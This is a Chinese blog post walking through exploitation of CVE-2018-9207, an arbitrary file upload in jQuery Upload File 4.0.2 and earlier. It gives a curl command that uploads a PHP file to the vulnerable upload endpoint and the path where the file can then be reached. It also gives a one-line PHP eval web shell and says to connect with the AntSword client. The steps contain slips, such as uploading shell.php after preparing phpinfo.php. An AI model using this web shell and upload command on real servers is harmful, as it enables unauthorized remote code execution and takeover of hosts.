首页 前端知识 jquery文件上传(CVE-2018-9207)

jquery文件上传(CVE-2018-9207)

2024-06-18 22:06:22 前端知识 前端哥 280 407 我要收藏

漏洞描述:

 jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file。

复现过程:

1.访问ip:port

2.准备好phpinfo.php文件,在文件目录下cmd

<?php phpinfo(); ?>

3.通过crul命令上传木马文件phpinfo.php                

curl -F "myfile=@shell.php" "http://ip:port/jquery-upload-file/php/upload.php"

4.打开文件位置正常解析php文件

http://ip:port/jquery-upload-file/php/uploads/phpinfo.php

5.Getshell

<?php @eval($_POST['cmd']);?>

6.蚁剑连接

转载请注明出处或者链接地址:https://www.qianduange.cn//article/12690.html
标签
android
评论
发布的文章
大家推荐的文章
会员中心 联系我 留言建议 回顶部
复制成功!